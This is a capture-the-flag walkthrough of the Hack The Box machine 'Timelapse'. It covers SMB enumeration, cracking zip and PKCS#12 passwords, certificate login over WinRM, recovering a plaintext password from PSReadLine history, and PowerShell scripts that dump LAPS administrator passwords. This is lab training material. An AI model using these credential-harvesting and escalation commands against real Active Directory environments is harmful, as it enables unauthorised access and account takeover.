Hack The Box Timelapse Walkthrough

Timelapse

Initial recon

Ping

The target runs Windows. Windows Defender Firewall blocks inbound ICMP echo requests on the Public and Private profiles by default, so Windows hosts often do not answer ping; on this box the author seems to have allowed it. The TTL of 127 is a hint on its own: Windows replies start at 128 and the packets crossed one hop (the VPN gateway).

$ ping -c2 10.10.11.152
PING 10.10.11.152 (10.10.11.152) 56(84) bytes of data.
64 bytes from 10.10.11.152: icmp_seq=1 ttl=127 time=83.8 ms
64 bytes from 10.10.11.152: icmp_seq=2 ttl=127 time=83.5 ms

--- 10.10.11.152 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 83.485/83.620/83.755/0.135 ms

Port scanning

Here is the result of nmap port scanning :

$ sudo nmap -sSVC -p- -T5 10.10.11.152 -oA timelapse_full
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 10:39 CEST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.11.152
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-05-31 16:47:17Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-05-31T16:48:49+00:00; +7h59m53s from scanner time.
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
54524/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-31T16:48:08
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m52s, deviation: 0s, median: 7h59m52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 579.88 seconds

The LDAP banner and the TLS certificate on 5986 give us the domain name and the server name:

  • timelapse.htb -> Domain
    • dc01.timelapse.htb -> Server name

Kerberos (88), LDAP (389/636) and the global catalog (3268/3269) together are only served by a domain controller, so DC01 is a DC and the OS is Windows Server. Two other lines of the scan matter later: SMB signing is required (so NTLM relay to SMB is off the table), and the clock skew is about 8 hours. Kerberos tolerates 5 minutes of skew at most, so any Kerberos-based tooling has to run with an adjusted clock (for example under faketime); SMB and WinRM with NTLM or certificate authentication are unaffected.

SMB

Getting the archive

Share listing (no credentials are needed; an empty password at the prompt works):

$ smbclient -L 10.10.11.152
Password for [MYGROUP\libereau]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

The Shares share contains a Dev folder with a password-protected zip file, winrm_backup.zip, which we download with smbclient's get command.

$ smbclient //10.10.11.152/SHARES
Password for [MYGROUP\libereau]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Oct 25 17:39:15 2021
  ..                                  D        0  Mon Oct 25 17:39:15 2021
  Dev                                 D        0  Mon Oct 25 21:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 17:48:42 2021

                6367231 blocks of size 4096. 1319349 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 21:40:06 2021
  ..                                  D        0  Mon Oct 25 21:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 17:46:42 2021

                6367231 blocks of size 4096. 1318297 blocks available

Cracking the archive

The zip file is password protected.

[screenshot: Zip password protected]

I've tried many things, like zip2john and trying to break the hash, but it didn't work. So I found an online tool, which gave me the password for the zip file:

[screenshot: Cracked password]

The password is "supremelegacy".

The archive contains legacyy_dev_auth.pfx.

First access to the machine

A .pfx file is a PKCS#12 bundle: it holds a certificate together with its private key, and the whole bundle is itself protected by a password. WinRM over HTTPS (port 5986) supports certificate authentication, so a client certificate mapped to a domain account lets us log in with evil-winrm without knowing that account's password. First we need the bundle's password.

After some googling (again!) I found a tool to brute-force pfx files, called crackpkcs12. The tool takes as input the pfx file (obviously) and a dictionary. I ran it with rockyou, and after some time:

$ crackpkcs12 -d rockyou.txt legacyy_dev_auth.pfx 

Dictionary attack - Starting 1 threads
*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************

The password is thuglegacy.

We can then split the bundle into its certificate and private key with openssl (each command prompts for the import password, thuglegacy):

$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem   # certificate only
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out win.key     # private key, written unencrypted
$ openssl x509 -in cert.pem -noout -subject -ext subjectAltName            # which account is it bound to?

The subject / SAN of the certificate tells you which account it maps to (legacyy, as the file name suggests). Connecting is then straightforward: give evil-winrm the certificate with -c cert.pem and the key with -k win.key, and do not forget -S, because WinRM is only exposed over HTTPS (5986) on this box:

[screenshot: First access]

Privilege Escalation

After getting the foothold, the first thing to do is to upload winPEAS (winpeas.bat or .exe) and run it; evil-winrm's built-in "upload" command puts it on the target. I ran it and saw something interesting:

 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)   9,038,331,904 bytes free

The content of the file is the following :

whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

We can see a user svc_deploy and a password E3R$Q62^12p7PLlC%KWaxuaV, which is most likely the svc_deploy password: the line right after it tests that credential against the local WinRM HTTPS listener. PSReadLine appends every interactive command to this file, so anything typed inline, passwords included, survives long after the session that typed it.
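Here is an added PowerShell example (not from the original walkthrough) that automates the two things this history shows: sweeping every readable PSReadLine history file for credential-looking commands, and checking a recovered credential with the same loopback Invoke-Command over WinRM HTTPS that the history itself uses. The regex list and the function name Test-WinRMCredential are my own choices; the history path is PSReadLine's default location.

```powershell
# Added example, not from the original walkthrough.
# 1. Sweep every readable PSReadLine history file for credential-looking lines.
#    Default PSReadLine location; (Get-PSReadLineOption).HistorySavePath shows
#    the current user's real file if it has been relocated.
$historyGlob = 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
$credPatterns = @(
    'ConvertTo-SecureString\s+\S+\s+-AsPlainText'    # inline plaintext -> SecureString
    'PSCredential\s*\('                              # credential object construction
    '-(Password|Pass|Pwd)\s+\S+'                     # generic -Password <value>
    'net\s+user\s+\S+\s+\S+'                         # net user <name> <password>
    'cmdkey\s+/add'                                  # stored Windows credentials
) -join '|'                                          # assumed patterns, extend to taste

Get-ChildItem -Path $historyGlob -ErrorAction SilentlyContinue |
    Select-String -Pattern $credPatterns |
    ForEach-Object {
        [pscustomobject]@{
            Profile = ($_.Path -split '\\')[2]       # C:\Users\<profile>\...
            Line    = $_.LineNumber
            Text    = $_.Line.Trim()
        }
    } | Format-Table -AutoSize -Wrap

# 2. Check a recovered credential without leaving the box: loopback WinRM over
#    HTTPS on 5986, skipping the self-signed certificate checks exactly as the
#    history did. A successful call prints the effective identity.
function Test-WinRMCredential {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Password,
        [string]$ComputerName = 'localhost'
    )
    $secure = ConvertTo-SecureString $Password -AsPlainText -Force
    $cred   = New-Object System.Management.Automation.PSCredential ($UserName, $secure)
    $opt    = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
    try {
        Invoke-Command -ComputerName $ComputerName -Port 5986 -UseSSL -SessionOption $opt `
                       -Credential $cred -ScriptBlock { whoami } -ErrorAction Stop
    } catch {
        Write-Warning "Logon failed for ${UserName}: $($_.Exception.Message)"
    }
}

# Candidate taken from the history shown above
Test-WinRMCredential -UserName 'svc_deploy' -Password 'E3R$Q62^12p7PLlC%KWaxuaV'
```

Run as the foothold user you will normally only be able to read your own history file; the sweep becomes interesting again once you hold a more privileged account. The single-quoted password literal matters: in double quotes PowerShell would expand the $Q part of it.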

Earlier, while browsing the SMB Shares share, we saw some documentation about LAPS.

LAPS (Local Administrator Password Solution) manages the local Administrator password of domain-joined computers: the client rotates it to a random value and writes it to the ms-Mcs-AdmPwd attribute of the computer object in Active Directory, with the next rotation time in ms-Mcs-AdmPwdExpirationTime. The attribute is confidential and protected by the object's ACL, so only principals explicitly granted read access on it (typically a helpdesk or deployment group) can recover the password. Whether svc_deploy is such a principal is exactly what to test next.

Many tools are available on GitHub for dumping LAPS passwords. I used this one. You just have to specify the user, password and domain name:

[screenshot: Extract passwords]

The dump returns the Administrator password for DC01. LAPS rotates it when the expiration time is reached, so use it promptly. We can then log in as Administrator with evil-winrm (still with -S, since only the HTTPS listener on 5986 is exposed).
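The LAPS dumper used above is not named on the page, so here is an added PowerShell example (not from the walkthrough) of the same step done with the ActiveDirectory module, which the history above (get-aduser) shows is present on DC01: it dumps every ms-Mcs-AdmPwd the current account is allowed to read and, for one computer, lists the ACEs that grant that read. The function name Get-LapsReaders is my own. It targets legacy LAPS (ms-Mcs-AdmPwd); the newer Windows LAPS keeps the secret in msLAPS-Password / msLAPS-EncryptedPassword instead and is read with Get-LapsADPassword.

```powershell
# Added example, not from the walkthrough: read legacy LAPS passwords with the
# ActiveDirectory module and see who is allowed to read them.
Import-Module ActiveDirectory

# 1. Every computer whose ms-Mcs-AdmPwd we may read. The attribute is confidential,
#    so it simply comes back empty for principals that lack the right.
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime' |
    Where-Object { $_.'ms-Mcs-AdmPwd' } |
    ForEach-Object {
        [pscustomobject]@{
            Computer = $_.Name
            Password = $_.'ms-Mcs-AdmPwd'
            Expires  = [datetime]::FromFileTimeUtc([int64]$_.'ms-Mcs-AdmPwdExpirationTime')
        }
    } | Format-Table -AutoSize

# 2. Which principals hold read rights on that attribute for a given computer.
#    Reading a confidential attribute needs ReadProperty plus control access
#    (ExtendedRight) on it; LAPS grants both on the attribute GUID, and
#    GenericAll or "all extended rights" (empty ObjectType) on the object
#    implies them. This lists the candidate ACEs, not a full effective-access
#    computation.
function Get-LapsReaders {
    param([Parameter(Mandatory)][string]$ComputerName)

    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema: legacy LAPS is not deployed here' }
    $attrGuid = [guid]::new([byte[]]$attr.schemaIDGUID)

    $computer = Get-ADComputer -Filter "Name -eq '$ComputerName'"
    if (-not $computer) { throw "No computer object named $ComputerName" }

    (Get-Acl -Path "AD:\$($computer.DistinguishedName)").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.ObjectType -eq $attrGuid -or $_.ObjectType -eq [guid]::Empty) -and
            $_.ActiveDirectoryRights -match 'ReadProperty|ExtendedRight|GenericAll'
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, ObjectType, IsInherited
}

Get-LapsReaders -ComputerName 'DC01' | Format-Table -AutoSize
```

Run it from the svc_deploy session: if the first part prints a password for DC01, the second part shows the group membership that made it readable, which is the finding to write up. The Expires column is the moment the password stops working.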

Bim Bam Boom, rooted !

[screenshot: Admin connection]

Thank you for reading, Libereau